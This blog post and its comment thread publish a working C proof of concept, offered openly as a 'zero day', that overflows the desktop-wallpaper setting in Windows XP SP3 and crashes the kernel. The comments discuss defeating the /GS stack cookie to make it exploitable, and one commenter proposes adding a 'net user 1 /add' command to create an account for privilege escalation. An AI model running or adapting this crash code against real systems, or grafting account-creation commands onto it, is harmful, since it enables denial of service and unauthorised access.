Oh No, My XPSP3

#include <windows.h>
int main()
{
 WCHAR c[1000] = {0};
 memset(c, ‘c’, 1000);
 SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

 WCHAR b[1000] = {0};
 SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
 return 0;
}

Two posts ago I talked about vulnerabilities. So here’s some Zero Day. This will crash your system, unless you’re on Vista (which is already immune to it). And why the heck on SP3 we are still having this thing not closed yet?

It might be exploitable, I didn’t research it any further than the BSOD of the security cookie…Maybe on some compilations without /GS it can be easily exploited. Or maybe overriding enough of the stack to trigger an exception could be it.

“Remember to let her into your heart,
Then you can start to make it better” – The Beatles.

7 Responses to “Oh No, My XPSP3”

  1. mxatone says:

    Hi,

    I already looked at it some months ago and didn’t find a way to exploit this vulnerability properly. As far as I remember, there is not exception handler during this overflow and the /GS flag should be guessed in order to make it properly. It is quite uneasy to do but with some memory leaking vuln, it could be done (maybe). You may already notice that you need the SETDESKWALLPAPER right to do it properly too (even if almost anyone got it).

    Have fun !

  2. arkon says:

    That’s the reason I didn’t mind giving it here. If someone manages to exploit it, way to go, I didn’t even try though. I have more pressing matters on my mind :)

    It works on Guest User, what can you ask more? Besides maybe on WY2k, you don’t have the /GS…

  3. mxatone says:

    Well yeah, just that on some citrix (or alike) configurations I doubt you can change the wallpaper but I’m not an expert on that field :) .

    I didn’t look in W2K, there is a good chance that /GS cookie could be easier to defeat or not existing at all (it may depend of the service pack too).

  4. Peter Ferrie says:

    Windows 2000 is not vulnerable. It fails the first call quietly, the second call succeeds, and the system keeps running normally.

  5. arkon says:

    Code regression? Or maybe some changes in the profile/registry stuff.

  6. hacker_bug says:

    #include <windows.h>
    int main()
    {
    const int SPI_GETDESKWALLPAPER = 115;
    WCHAR c[1000] = {0};
    memset(c, ‘c’, 1000);
    SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

    WCHAR b[1000] = {0};
    SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
    return 0;
    }

    I don’t know how to add this sentence exploit it to Elevation of Privilege
    system(“net user 1 /add”);

  7. [...] even learned that my post about the kernel DoS in XPSP3 about the desktop wallpaper weakness became a CVE. It seems MS has [...]

Leave a Reply